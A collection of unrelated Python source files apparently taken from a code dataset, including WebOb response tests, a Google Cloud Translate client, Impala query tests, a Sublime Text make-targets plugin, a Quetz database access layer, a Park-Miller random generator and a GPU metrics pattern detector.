def test_encode_content_gzip_notyet_gzipped_lazy():
res = Response()
res.app_iter = StringIO('foo')
result = res.encode_content('gzip', lazy=True)
eq_(result, None)
eq_(res.content_length, None)
eq_(list(res.app_iter), ['\x1f\x8b\x08\x00\x00\x00\x00\x00\x02\xff', '',
'K\xcb\xcf\x07\x00', '!es\x8c\x03\x00\x00\x00'])
def test_decode_content_identity():
res = Response()
res.content_encoding = 'identity'
result = res.decode_content()
eq_(result, None)
def test_decode_content_weird():
res = Response()
res.content_encoding = 'weird'
assert_raises(ValueError, res.decode_content)
def test_decode_content_gzip():
from gzip import GzipFile
io = StringIO()
gzip_f = GzipFile(filename='', mode='w', fileobj=io)
gzip_f.write('abc')
gzip_f.close()
body = io.getvalue()
res = Response()
res.content_encoding = 'gzip'
res.body = body
res.decode_content()
eq_(res.body, 'abc')
def test__abs_headerlist_location_with_scheme():
res = Response()
res.content_encoding = 'gzip'
res.headerlist = [('Location', 'http:')]
result = res._abs_headerlist({})
eq_(result, [('Location', 'http:')])
def test_response_set_body_file():
for data in ['abc', 'abcdef'*1024]:
file = StringIO(data)
r = Response(body_file=file)
assert r.body == data
|
the-stack_106_23357 | # Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Client for interacting with the Google Cloud Translate API."""
import httplib2
import six
from gcloud._helpers import _to_bytes
from gcloud.translate.connection import Connection
ENGLISH_ISO_639 = 'en'
"""ISO 639-1 language code for English."""
class Client(object):
"""Client to bundle configuration needed for API requests.
:type api_key: str
:param api_key: The key used to send with requests as a query
parameter.
:type http: :class:`httplib2.Http` or class that defines ``request()``.
:param http: (Optional) HTTP object to make requests. If not
                 passed, an :class:`httplib2.Http` object is created.
:type target_language: str
:param target_language: (Optional) The target language used for
translations and language names. (Defaults to
:data:`ENGLISH_ISO_639`.)
"""
def __init__(self, api_key, http=None, target_language=ENGLISH_ISO_639):
self.api_key = api_key
if http is None:
http = httplib2.Http()
self.connection = Connection(http=http)
self.target_language = target_language
def get_languages(self, target_language=None):
"""Get list of supported languages for translation.
See: https://cloud.google.com/translate/v2/\
discovering-supported-languages-with-rest
:type target_language: str
:param target_language: (Optional) The language used to localize
returned language names. Defaults to the
target language on the current client.
:rtype: list
:returns: List of dictionaries. Each dictionary contains a supported
ISO 639-1 language code (using the dictionary key
``language``). If ``target_language`` is passed, each
dictionary will also contain the name of each supported
language (localized to the target language).
"""
query_params = {'key': self.api_key}
if target_language is None:
target_language = self.target_language
if target_language is not None:
query_params['target'] = target_language
response = self.connection.api_request(
method='GET', path='/languages', query_params=query_params)
return response.get('data', {}).get('languages', ())
def detect_language(self, values):
"""Detect the language of a string or list of strings.
See: https://cloud.google.com/translate/v2/\
detecting-language-with-rest
:type values: str or list
:param values: String or list of strings that will have
language detected.
:rtype: str or list
:returns: A list of dictionaries for each queried value. Each
dictionary typically contains three keys
* ``confidence``: The confidence in language detection, a
float between 0 and 1.
* ``input``: The corresponding input value.
* ``language``: The detected language (as an ISO 639-1
language code).
though the key ``confidence`` may not always be present.
If only a single value is passed, then only a single
dictionary will be returned.
:raises: :class:`ValueError <exceptions.ValueError>` if the number of
detections is not equal to the number of values.
:class:`ValueError <exceptions.ValueError>` if a value
produces a list of detections with 0 or multiple results
in it.
"""
single_value = False
if isinstance(values, six.string_types):
single_value = True
values = [values]
query_params = [('key', self.api_key)]
query_params.extend(('q', _to_bytes(value, 'utf-8'))
for value in values)
response = self.connection.api_request(
method='GET', path='/detect', query_params=query_params)
detections = response.get('data', {}).get('detections', ())
if len(values) != len(detections):
raise ValueError('Expected same number of values and detections',
values, detections)
for index, value in enumerate(values):
# Empirically, even clearly ambiguous text like "no" only returns
# a single detection, so we replace the list of detections with
# the single detection contained.
if len(detections[index]) == 1:
detections[index] = detections[index][0]
else:
message = ('Expected a single detection per value, API '
'returned %d') % (len(detections[index]),)
raise ValueError(message, value, detections[index])
detections[index]['input'] = value
# The ``isReliable`` field is deprecated.
detections[index].pop('isReliable', None)
if single_value:
return detections[0]
else:
return detections
def translate(self, values, target_language=None, format_=None,
source_language=None, customization_ids=()):
"""Translate a string or list of strings.
See: https://cloud.google.com/translate/v2/\
translating-text-with-rest
:type values: str or list
:param values: String or list of strings to translate.
:type target_language: str
:param target_language: The language to translate results into. This
is required by the API and defaults to
the target language of the current instance.
:type format_: str
:param format_: (Optional) One of ``text`` or ``html``, to specify
if the input text is plain text or HTML.
:type source_language: str
:param source_language: (Optional) The language of the text to
be translated.
:type customization_ids: str or list
:param customization_ids: (Optional) ID or list of customization IDs
for translation. Sets the ``cid`` parameter
in the query.
        :rtype: str or list
:returns: A list of dictionaries for each queried value. Each
dictionary typically contains three keys (though not
all will be present in all cases)
* ``detectedSourceLanguage``: The detected language (as an
ISO 639-1 language code) of the text.
* ``translatedText``: The translation of the text into the
target language.
* ``input``: The corresponding input value.
If only a single value is passed, then only a single
dictionary will be returned.
:raises: :class:`ValueError <exceptions.ValueError>` if the number of
values and translations differ.
"""
single_value = False
if isinstance(values, six.string_types):
single_value = True
values = [values]
if target_language is None:
target_language = self.target_language
if isinstance(customization_ids, six.string_types):
customization_ids = [customization_ids]
query_params = [('key', self.api_key), ('target', target_language)]
query_params.extend(('q', _to_bytes(value, 'utf-8'))
for value in values)
query_params.extend(('cid', cid) for cid in customization_ids)
if format_ is not None:
query_params.append(('format', format_))
if source_language is not None:
query_params.append(('source', source_language))
response = self.connection.api_request(
method='GET', path='', query_params=query_params)
translations = response.get('data', {}).get('translations', ())
if len(values) != len(translations):
raise ValueError('Expected iterations to have same length',
values, translations)
for value, translation in six.moves.zip(values, translations):
translation['input'] = value
if single_value:
return translations[0]
else:
return translations
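# A minimal usage sketch of the Client above. It assumes a valid Translate
# API key exported in an environment variable (the name
# GOOGLE_TRANSLATE_API_KEY is arbitrary, not part of this library), and the
# calls below reach the live API, so treat it as an illustration rather than
# a test.
if __name__ == '__main__':
    import os
    client = Client(api_key=os.environ['GOOGLE_TRANSLATE_API_KEY'])
    # Each entry is a dict such as {'language': 'de', 'name': 'German'}.
    print(client.get_languages()[:3])
    # A single input value returns a single dict (see detect_language).
    print(client.detect_language('Hallo Welt'))
    # The target language defaults to the client's (ENGLISH_ISO_639 here).
    print(client.translate('Hallo Welt', source_language='de'))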
|
the-stack_106_23361 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# General Impala query tests
import copy
import pytest
import re
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.test_dimensions import create_uncompressed_text_dimension
from tests.common.test_vector import ImpalaTestVector
class TestQueries(ImpalaTestSuite):
@classmethod
def add_test_dimensions(cls):
super(TestQueries, cls).add_test_dimensions()
if cls.exploration_strategy() == 'core':
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').file_format == 'parquet')
# Manually adding a test dimension here to test the small query opt
# in exhaustive.
# TODO Cleanup required, allow adding values to dimensions without having to
# manually explode them
if cls.exploration_strategy() == 'exhaustive':
dim = cls.ImpalaTestMatrix.dimensions["exec_option"]
new_value = []
for v in dim:
new_value.append(ImpalaTestVector.Value(v.name, copy.copy(v.value)))
new_value[-1].value["exec_single_node_rows_threshold"] = 100
dim.extend(new_value)
cls.ImpalaTestMatrix.add_dimension(dim)
@classmethod
def get_workload(cls):
return 'functional-query'
def test_analytic_fns(self, vector):
# TODO: Enable some of these tests for Avro if possible
# Don't attempt to evaluate timestamp expressions with Avro tables which don't
# support a timestamp type
table_format = vector.get_value('table_format')
if table_format.file_format == 'avro':
pytest.xfail("%s doesn't support TIMESTAMP" % (table_format.file_format))
if table_format.file_format == 'hbase':
pytest.xfail("A lot of queries check for NULLs, which hbase does not recognize")
self.run_test_case('QueryTest/analytic-fns', vector)
def test_limit(self, vector):
if vector.get_value('table_format').file_format == 'hbase':
pytest.xfail("IMPALA-283 - select count(*) produces inconsistent results")
if vector.get_value('table_format').file_format == 'kudu':
pytest.xfail("Limit queries without order by clauses are non-deterministic")
self.run_test_case('QueryTest/limit', vector)
def test_top_n(self, vector):
if vector.get_value('table_format').file_format == 'hbase':
pytest.xfail(reason="IMPALA-283 - select count(*) produces inconsistent results")
# QueryTest/top-n is also run in test_sort with disable_outermost_topn = 1
self.run_test_case('QueryTest/top-n', vector)
def test_union(self, vector):
self.run_test_case('QueryTest/union', vector)
# IMPALA-3586: The passthrough and materialized children are interleaved. The batch
# size is small to test the transition between materialized and passthrough children.
query_string = ("select count(c) from ( "
"select bigint_col + 1 as c from functional.alltypes limit 15 "
"union all "
"select bigint_col as c from functional.alltypes limit 15 "
"union all "
"select bigint_col + 1 as c from functional.alltypes limit 15 "
"union all "
"(select bigint_col as c from functional.alltypes limit 15)) t")
vector.get_value('exec_option')['batch_size'] = 10
result = self.execute_query(query_string, vector.get_value('exec_option'))
assert result.data[0] == '60'
def test_sort(self, vector):
if vector.get_value('table_format').file_format == 'hbase':
pytest.xfail(reason="IMPALA-283 - select count(*) produces inconsistent results")
vector.get_value('exec_option')['disable_outermost_topn'] = 1
self.run_test_case('QueryTest/sort', vector)
# We can get the sort tests for free from the top-n file
self.run_test_case('QueryTest/top-n', vector)
def test_inline_view(self, vector):
if vector.get_value('table_format').file_format == 'hbase':
pytest.xfail("jointbl does not have columns with unique values, "
"hbase collapses them")
self.run_test_case('QueryTest/inline-view', vector)
def test_inline_view_limit(self, vector):
self.run_test_case('QueryTest/inline-view-limit', vector)
def test_subquery(self, vector):
self.run_test_case('QueryTest/subquery', vector)
def test_empty(self, vector):
self.run_test_case('QueryTest/empty', vector)
def test_views(self, vector):
if vector.get_value('table_format').file_format == "hbase":
pytest.xfail("TODO: Enable views tests for hbase")
self.run_test_case('QueryTest/views', vector)
def test_with_clause(self, vector):
if vector.get_value('table_format').file_format == "hbase":
pytest.xfail("TODO: Enable with clause tests for hbase")
self.run_test_case('QueryTest/with-clause', vector)
def test_misc(self, vector):
table_format = vector.get_value('table_format')
if table_format.file_format in ['hbase', 'rc', 'parquet', 'kudu']:
msg = ("Failing on rc/snap/block despite resolution of IMP-624,IMP-503. "
"Failing on kudu and parquet because tables do not exist")
pytest.xfail(msg)
self.run_test_case('QueryTest/misc', vector)
def test_null_data(self, vector):
if vector.get_value('table_format').file_format == 'hbase':
pytest.xfail("null data does not appear to work in hbase")
self.run_test_case('QueryTest/null_data', vector)
# Tests in this class are only run against text/none either because that's the only
# format that is supported, or the tests don't exercise the file format.
class TestQueriesTextTables(ImpalaTestSuite):
@classmethod
def add_test_dimensions(cls):
super(TestQueriesTextTables, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_dimension(
create_uncompressed_text_dimension(cls.get_workload()))
@classmethod
def get_workload(cls):
return 'functional-query'
def test_overflow(self, vector):
self.run_test_case('QueryTest/overflow', vector)
def test_strict_mode(self, vector):
vector.get_value('exec_option')['strict_mode'] = 1
vector.get_value('exec_option')['abort_on_error'] = 0
self.run_test_case('QueryTest/strict-mode', vector)
vector.get_value('exec_option')['abort_on_error'] = 1
self.run_test_case('QueryTest/strict-mode-abort', vector)
def test_data_source_tables(self, vector):
self.run_test_case('QueryTest/data-source-tables', vector)
def test_distinct_estimate(self, vector):
# These results will vary slightly depending on how the values get split up
# so only run with 1 node and on text.
vector.get_value('exec_option')['num_nodes'] = 1
self.run_test_case('QueryTest/distinct-estimate', vector)
def test_mixed_format(self, vector):
self.run_test_case('QueryTest/mixed-format', vector)
def test_values(self, vector):
self.run_test_case('QueryTest/values', vector)
# Tests in this class are only run against Parquet because the tests don't exercise the
# file format.
class TestQueriesParquetTables(ImpalaTestSuite):
@classmethod
def add_test_dimensions(cls):
super(TestQueriesParquetTables, cls).add_test_dimensions()
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').file_format == 'parquet')
@classmethod
def get_workload(cls):
return 'functional-query'
@pytest.mark.execute_serially
def test_very_large_strings(self, vector):
"""Regression test for IMPALA-1619. Doesn't need to be run on all file formats.
Executes serially to avoid large random spikes in mem usage."""
self.run_test_case('QueryTest/large_strings', vector)
def test_single_node_large_sorts(self, vector):
if self.exploration_strategy() != 'exhaustive':
pytest.skip("only run large sorts on exhaustive")
vector.get_value('exec_option')['disable_outermost_topn'] = 1
vector.get_value('exec_option')['num_nodes'] = 1
self.run_test_case('QueryTest/single-node-large-sorts', vector)
# Tests for queries in HDFS-specific tables, e.g. AllTypesAggMultiFilesNoPart.
# This is a subclass of TestQueries to get the extra test dimension for
# exec_single_node_rows_threshold in exhaustive.
class TestHdfsQueries(TestQueries):
@classmethod
def add_test_dimensions(cls):
super(TestHdfsQueries, cls).add_test_dimensions()
# Kudu doesn't support AllTypesAggMultiFilesNoPart (KUDU-1271, KUDU-1570).
cls.ImpalaTestMatrix.add_constraint(lambda v:\
v.get_value('table_format').file_format != 'kudu')
def test_hdfs_scan_node(self, vector):
self.run_test_case('QueryTest/hdfs-scan-node', vector)
def test_file_partitions(self, vector):
self.run_test_case('QueryTest/hdfs-partitions', vector)
class TestTopNReclaimQuery(ImpalaTestSuite):
"""Test class to validate that TopN periodically reclaims tuple pool memory
and runs with a lower memory footprint."""
QUERY = "select * from tpch.lineitem order by l_orderkey desc limit 10;"
# Mem limit empirically selected so that the query fails if tuple pool reclamation
# is not implemented for TopN
MEM_LIMIT = "50m"
@classmethod
def get_workload(self):
return 'tpch'
@classmethod
def add_test_dimensions(cls):
super(TestTopNReclaimQuery, cls).add_test_dimensions()
# The tpch tests take a long time to execute so restrict the combinations they
# execute over.
cls.ImpalaTestMatrix.add_dimension(
create_uncompressed_text_dimension(cls.get_workload()))
def test_top_n_reclaim(self, vector):
exec_options = vector.get_value('exec_option')
exec_options['mem_limit'] = self.MEM_LIMIT
result = self.execute_query(self.QUERY, exec_options)
runtime_profile = str(result.runtime_profile)
num_of_times_tuple_pool_reclaimed = re.findall(
'TuplePoolReclamations: ([0-9]*)', runtime_profile)
# Confirm newly added counter is visible
assert len(num_of_times_tuple_pool_reclaimed) > 0
# Tuple pool is expected to be reclaimed for this query
for n in num_of_times_tuple_pool_reclaimed:
assert int(n) > 0
|
the-stack_106_23364 | import os, sublime, sublime_plugin, subprocess, json, re
FILE_REGEX = '^(..[^:\n]*):([0-9]+):?([0-9]+)?:? (.*)'
SYNTAX = 'Packages/Makefile/Make Output.sublime-syntax'
WORKING_DIR = '${folder:${project_path:${file_path}}}'
CANNED = {
'target': 'make_targets',
'file_regex': FILE_REGEX,
'working_dir': WORKING_DIR,
'selector': 'source.makefile',
'syntax': SYNTAX,
'keyfiles': ['Makefile', 'makefile'],
'cancel': {'kill': True},
'variants': [],
'makefile': None
}
TARGET_REGEX = r'(.+)\s*:\s{1}'
def plugin_loaded():
build_file = 'MakeTargets.build-template'
dest_file = '{}/User/MakeTargets.sublime-build'.format(sublime.packages_path())
if not os.path.isfile(dest_file):
with open(dest_file, 'w') as f:
json.dump(CANNED, f, indent=2)
def plugin_unloaded():
settings = Settings()
settings.clear_on_change('show_last_cmd_status_bar')
settings.clear_on_change('ignored_target_prefixes')
settings.clear_on_change('target_regex')
settings.clear_on_change('regen_on_save')
settings.clear_on_change('hide_dup_targets')
settings.clear_on_change('phony_name')
settings.clear_on_change('sort_targets')
settings.clear_on_change('job_number')
def Window(window=None):
return window if window else sublime.active_window()
def Variables(window=None):
return Window(window).extract_variables()
def Expand(variable, window=None):
return sublime.expand_variables(variable, Variables(window))
def Settings(file='MakeTargets.sublime-settings'):
return sublime.load_settings(file)
def PanelArg(variant='', caption='MakeTargets'):
return dict(
args=dict(
build_system='Packages/User/MakeTargets.sublime-build',
choice_build_system=True,
choice_variant=True,
variant=variant
),
caption=caption,
command='build'
)
class MakeTargetsCommand(sublime_plugin.WindowCommand):
  def __init__(self, window):
    sublime_plugin.WindowCommand.__init__(self, window)
settings = Settings()
settings.add_on_change('show_last_cmd_status_bar', self.on_show_last_change)
settings.add_on_change('ignored_target_prefixes', self.on_ignore_prefixes_change)
settings.add_on_change('target_regex', self.on_target_regex_change)
settings.add_on_change('hide_dup_targets', self.on_hide_dup_targets_change)
settings.add_on_change('phony_name', self.on_phony_name_change)
settings.add_on_change('sort_targets', self.on_sort_targets_change)
settings.add_on_change('job_number', self.on_job_number_change)
self.build = Settings('MakeTargets.sublime-build')
self._targets = None
self.need_regen = True
self.target_regex = re.compile(settings.get('target_regex', TARGET_REGEX))
self.hide_dups = settings.get('hide_dup_targets', False)
self.phony = self.load_phony()
self.sort_targets = settings.get('sort_targets', False)
self.job_num = settings.get('job_number', None)
def load_phony(self):
phony = Settings().get('phony_name', None)
if phony and not phony.startswith('.'):
phony = '.' + phony
return phony
@property
def makefile(self):
return os.path.join(Expand('${project_path}', self.window), 'Makefile')
@property
def targets(self):
if not self._targets:
targets = []
if os.path.isfile(self.makefile):
with open(self.makefile, 'r') as f:
for line in f.readlines():
if self.phony:
if line.startswith(self.phony):
line = line.split(':', 1)[1].strip()
targets = line.split(' ')
break
elif self.target_regex.search(line):
line = line.strip()
if line and not any([line.startswith(ignore) for ignore in Settings().get('ignored_target_prefixes', [])]):
target = line.split(':')[0].strip()
if not (self.hide_dups and target in targets):
targets.append(target)
if self.sort_targets:
targets.sort()
self._targets = targets
return self._targets
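  # An illustration of the parsing above for a hypothetical Makefile:
  #
  #   all: build
  #   clean:
  #   build:
  #
  # Assuming none of these names match ignored_target_prefixes, every line
  # matches target_regex and targets becomes ['all', 'clean', 'build'].
  # If phony_name is configured, only the names listed on that
  # ".PHONY"-style line are used instead.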
def build_now(self, target, args={}):
self.window.run_command('exec', dict(
update_phantoms_only=True
))
cmd = 'make -j{} {}'.format(self.job_num if self.job_num else '', target).strip()
self.window.run_command('exec', dict(
cmd=cmd,
file_regex=args.get('file_regex', FILE_REGEX),
syntax=args.get('syntax', SYNTAX),
working_dir=args.get('working_dir', Expand(WORKING_DIR, self.window))
))
settings = Settings()
if settings.get('show_last_cmd_status_bar', False):
value = settings.get('status_bar_format', '{command}')
if '{command}' not in value:
value += '{command}'
self.window.active_view().set_status('mt_last_target', value.format(command=cmd))
def show_panel(self):
panel_args = {
'items': [
PanelArg(
variant=target.get('name', ''),
caption='MakeTargets - {}'.format(target.get('make_target', ''))
)
for target in self.build.get('variants')
]
}
panel_args['items'].insert(0, PanelArg())
self.window.run_command('quick_panel', panel_args)
def regen_targets(self, makefile=None):
self.need_regen = False
self._targets = None
self.build.set('makefile', makefile if makefile else self.makefile)
self.build.set('variants', [dict(name=target, make_target=target) for target in self.targets])
sublime.save_settings('MakeTargets.sublime-build')
def run(self, **args):
if args.get('kill'):
self.window.run_command('exec', dict(
kill=True
))
return
if args.get('regen', False):
self.regen_targets(args.get('makefile', None))
return
if self.need_regen or (self.targets and not self.build.get('variants', None) or (self.makefile != self.build.get('makefile', None))):
self.regen_targets()
self.show_panel()
return
if args.get('palette', False):
self.show_panel()
return
target = args.get('make_target', '')
if target == '<<no target>>':
target = ''
self.build_now(target, args)
# override
def on_show_last_change(self):
if not Settings().get('show_last_cmd_status_bar', False):
self.window.active_view().erase_status('mt_last_target')
# override
def on_ignore_prefixes_change(self):
self.need_regen = True
# override
def on_target_regex_change(self):
self.target_regex = re.compile(Settings().get('target_regex', TARGET_REGEX))
# override
def on_hide_dup_targets_change(self):
self.hide_dups = Settings().get('hide_dup_targets', False)
# override
def on_phony_name_change(self):
self.phony = self.load_phony()
self.need_regen = True
# override
def on_sort_targets_change(self):
self.sort_targets = Settings().get('sort_targets', False)
self.need_regen = True
# override
def on_job_number_change(self):
self.job_num = Settings().get('job_number', None)
class MakeTargetsEventListener(sublime_plugin.EventListener):
def __init__(self):
sublime_plugin.EventListener.__init__(self)
settings = Settings()
settings.add_on_change('regen_on_save', self.on_regen_on_save_change)
self.regen_on_save = settings.get('regen_on_save', False)
# override
def on_regen_on_save_change(self):
self.regen_on_save = Settings().get('regen_on_save', False)
def on_post_save_async(self, view):
if self.regen_on_save and view.file_name().endswith('Makefile'):
view.window().run_command('make_targets', {'regen': True, 'makefile': view.file_name()})
|
the-stack_106_23365 | # Copyright 2020 QuantStack
# Distributed under the terms of the Modified BSD License.
from sqlalchemy.orm import Session, joinedload, aliased
from .db_models import Profile, User, Channel, ChannelMember, Package, PackageMember, ApiKey, \
PackageVersion
from quetz import rest_models
import uuid
class Dao:
def __init__(self, db: Session):
self.db = db
def rollback(self):
self.db.rollback()
def get_profile(self, user_id):
return self.db.query(Profile).filter(Profile.user_id == user_id).one()
def get_user(self, user_id):
return self.db.query(User).filter(User.id == user_id).one()
def get_users(self, skip: int, limit: int, q: str):
query = self.db.query(User) \
.filter(User.username.isnot(None))
if q:
query = query.filter(User.username.ilike(f'%{q}%'))
return query \
.options(joinedload(User.profile)) \
.offset(skip) \
.limit(limit) \
.all()
def get_user_by_username(self, username: str):
return self.db.query(User) \
.filter(User.username == username) \
.options(joinedload(User.profile)) \
.one_or_none()
def get_channels(self, skip: int, limit: int, q: str):
query = self.db.query(Channel)
if q:
query = query.filter(Channel.name.ilike(f'%{q}%'))
return query \
.offset(skip) \
.limit(limit) \
.all()
def create_channel(self, data: rest_models.Channel, user_id: bytes, role: str):
channel = Channel(
name=data.name,
description=data.description)
member = ChannelMember(
channel=channel,
user_id=user_id, role=role)
self.db.add(channel)
self.db.add(member)
self.db.commit()
def get_packages(self, channel_name: str, skip: int, limit: int, q: str):
query = self.db.query(Package) \
.filter(Package.channel_name == channel_name)
if q:
query = query.filter(Package.name.like(f'%{q}%'))
return query \
.offset(skip) \
.limit(limit) \
.all()
def get_channel(self, channel_name: str):
return self.db.query(Channel) \
.filter(Channel.name == channel_name).one_or_none()
def get_package(self, channel_name: str, package_name: str):
return self.db.query(Package).join(Channel) \
.filter(Channel.name == channel_name) \
.filter(Package.name == package_name) \
.one_or_none()
def create_package(self, channel_name: str, new_package: rest_models.Package, user_id: bytes,
role: str):
package = Package(
name=new_package.name,
description=new_package.description)
package.channel = self.db.query(Channel) \
.filter(Channel.name == channel_name) \
.one()
member = PackageMember(
channel=package.channel,
package=package,
user_id=user_id, role=role)
self.db.add(package)
self.db.add(member)
self.db.commit()
def get_channel_members(self, channel_name: str):
return self.db.query(ChannelMember).join(User) \
.filter(ChannelMember.channel_name == channel_name) \
.all()
def get_channel_member(self, channel_name, username):
return self.db.query(ChannelMember).join(User) \
.filter(ChannelMember.channel_name == channel_name) \
.filter(User.username == username) \
.one_or_none()
def create_channel_member(self, channel_name, new_member):
user = self.get_user_by_username(new_member.username)
member = ChannelMember(
channel_name=channel_name,
user_id=user.id,
role=new_member.role)
self.db.add(member)
self.db.commit()
def get_package_members(self, channel_name, package_name):
return self.db.query(PackageMember).join(User) \
.filter(User.username.isnot(None)) \
.filter(PackageMember.channel_name == channel_name) \
.filter(PackageMember.package_name == package_name) \
.all()
def get_package_member(self, channel_name, package_name, username):
return self.db.query(PackageMember).join(User) \
.filter(PackageMember.channel_name == channel_name) \
.filter(PackageMember.package_name == package_name) \
.filter(User.username == username) \
.one_or_none()
def create_package_member(self, channel_name, package_name, new_member):
user = self.get_user_by_username(new_member.username)
member = PackageMember(
channel_name=channel_name,
package_name=package_name,
user_id=user.id,
role=new_member.role)
self.db.add(member)
self.db.commit()
def get_package_api_keys(self, user_id):
return self.db.query(PackageMember, ApiKey) \
.join(User, PackageMember.user_id == User.id) \
.join(ApiKey, ApiKey.user_id == User.id) \
.filter(ApiKey.owner_id == user_id) \
.all()
def get_channel_api_keys(self, user_id):
return self.db.query(ChannelMember, ApiKey) \
.join(User, ChannelMember.user_id == User.id) \
.join(ApiKey, ApiKey.user_id == User.id) \
.filter(ApiKey.owner_id == user_id) \
.all()
def create_api_key(self, user_id, api_key: rest_models.BaseApiKey, key):
user = User(id=uuid.uuid4().bytes)
owner = self.get_user(user_id)
db_api_key = ApiKey(
key=key,
description=api_key.description,
user=user,
owner=owner
)
self.db.add(db_api_key)
for role in api_key.roles:
if role.package:
package_member = PackageMember(
user=user,
channel_name=role.channel,
package_name=role.package,
role=role.role)
self.db.add(package_member)
else:
channel_member = ChannelMember(
user=user,
channel_name=role.channel,
role=role.role)
self.db.add(channel_member)
self.db.commit()
def create_version(self, channel_name, package_name, platform, version, build_number, build_string, filename, info,
uploader_id):
version = PackageVersion(
id=uuid.uuid4().bytes,
channel_name=channel_name,
package_name=package_name,
platform=platform,
version=version,
build_number=build_number,
build_string=build_string,
filename=filename,
info=info,
uploader_id=uploader_id
)
self.db.add(version)
self.db.commit()
def get_package_versions(self, package):
ApiKeyProfile = aliased(Profile)
return self.db.query(PackageVersion, Profile, ApiKeyProfile) \
.outerjoin(Profile, Profile.user_id == PackageVersion.uploader_id) \
.outerjoin(ApiKey, ApiKey.user_id == PackageVersion.uploader_id) \
.outerjoin(ApiKeyProfile, ApiKey.owner_id == ApiKeyProfile.user_id) \
.filter(PackageVersion.channel_name == package.channel_name) \
.filter(PackageVersion.package_name == package.name) \
.all()
|
the-stack_106_23366 | import numpy as np
import logging
class MyRand(object):
'''
Class that provides the function random() which returns a 'random number'
in the open(!) interval (0,1). The class has been created for TESTING and
DEVELOPMENT purposes and PRODUCES THE SAME SEQUENCE of 'random numbers'
for a given seed < 0 (as long as no multiple threads are running).
This also works 'cross-language' with the Fortran implementation.
'''
idum = -4242
iv = None
iy = None
def __init__(self, seed=None):
self.logger = logging.getLogger(f'{__name__}.{__class__.__name__}')
self.idum = self.__class__.idum if seed==None else seed
self.iv = self.__class__.iv
self.iy = self.__class__.iy
self.logger.debug(f'Random number seed: {self.idum}')
def ran1(self):
'''
From Numerical Recipes in F77, 2nd. Edition, corresponds to ran1.
Adapted to double precision (Python float).
“Minimal” random number generator of Park and Miller with Bays-Durham
shuffle and added safeguards. Returns a uniform random deviate between
0.0 and 1.0 (exclusive of the endpoint values). Call with self.idum a
negative integer to initialize; thereafter, do not alter idum between
successive deviates in a sequence. RNMX should approximate the largest
floating value that is less than 1.
Returns
-------
float
Next 'random number' in the sequence.
'''
# INTEGER idum,IA,IM,IQ,IR,NTAB,NDIV
# REAL ran1,AM,EPS,RNMX
# IA=16807,IM=2147483647,AM=1./IM,IQ=127773,IR=2836
# NTAB=32,NDIV=1+(IM-1)/NTAB,EPS=1.2e-7,RNMX=1.-EPS
IA=16807
IM=2147483647
# AM=np.float32(1./IM)
AM=1/IM
IQ=127773
IR=2836
NTAB=32
NDIV=1+int((IM-1)/NTAB)
# EPS=np.float32(1.2e-7)
# RNMX=np.float32(1.-EPS)
EPS=1.2e-7
RNMX=1.-EPS
RNMX = 1-2.23e-16 # 2.23d-16 is approx. np.finfo(float).eps
# INTEGER j,k,iv(NTAB),iy
# SAVE iv,iy
# DATA iv /NTAB*0/, iy /0/
if self.iv is None:
self.iv = np.int_([0]*NTAB)
if self.iy is None:
self.iy = 0
if self.idum <= 0 or self.iy == 0:
self.idum=max(-self.idum,1)
# do 11 j=NTAB+8,1,-1
for j in range(NTAB+8,0,-1):
# self.logger.debug(f'\t1 ran1.idum={ran1.idum}')
k = self.idum // IQ
self.idum = IA*(self.idum-k*IQ)-IR*k
if self.idum < 0:
self.idum += IM
if j <= NTAB:
self.iv[j-1] = self.idum
self.iy = self.iv[0]
# self.logger.debug(f'\t2 ran1.idum={ran1.idum}')
k = self.idum // IQ
self.idum = IA*(self.idum-k*IQ)-IR*k
if self.idum < 0:
self.idum += IM
# self.logger.debug(f'\t3 ran1.iy={ran1.iy}')
j = 1 + self.iy // NDIV
self.iy = self.iv[j-1]
self.iv[j-1] = self.idum
return min(AM*self.iy,RNMX)
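# A minimal usage sketch: two instances seeded with the same negative value
# produce identical sequences, which is the reproducibility property the
# class docstring describes (the seed value below is arbitrary).
if __name__ == '__main__':
    rng_a = MyRand(seed=-4242)
    rng_b = MyRand(seed=-4242)
    seq = [rng_a.ran1() for _ in range(5)]
    assert seq == [rng_b.ran1() for _ in range(5)]
    print(seq)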
|
the-stack_106_23368 | from prometheus_api_client import PrometheusConnect, MetricsList
from prometheus_api_client.utils import parse_datetime
import pandas as pd
import os
import time
import logging
from kubernetes import config, client
from scipy.stats import norm
import numpy as np
import subprocess
import copy
from pynvml import *
import math
import ast
MEM_UTIL = "DCGM_FI_DEV_MEM_COPY_UTIL"
GPU_UTIL = "DCGM_FI_DEV_GPU_UTIL"
DOMAIN = "ai.centaurus.io"
def cyclic_pattern_detection(time_series):
"""input pandas series, detect cyclic pattern return True/False
if True, return frequency, if false, frequency is -1
"""
# calculate autocorrelation
auto_corr = [time_series.autocorr(lag=i) for i in range(int(len(time_series)/2))]
# assume auto_corr value is normal distribution, based on 95% confidence interval, calculate the line for signifence
critical = norm.ppf(1-0.05/2, loc=np.mean(auto_corr), scale=np.std(auto_corr))
peak_lag = []
# select the peak of correlation coefficients
for i, v in enumerate(auto_corr):
if v > critical: # if auto corr value > critical value, consider the correlation is significant
peak_lag.append(i)
if len(peak_lag) > 2: # repetitive significant peaks as the rule for cyclic patterns
lag_diff = pd.Series(peak_lag).diff() # to calculate period
period = lag_diff.median()
return True, period
else:
return False, -1
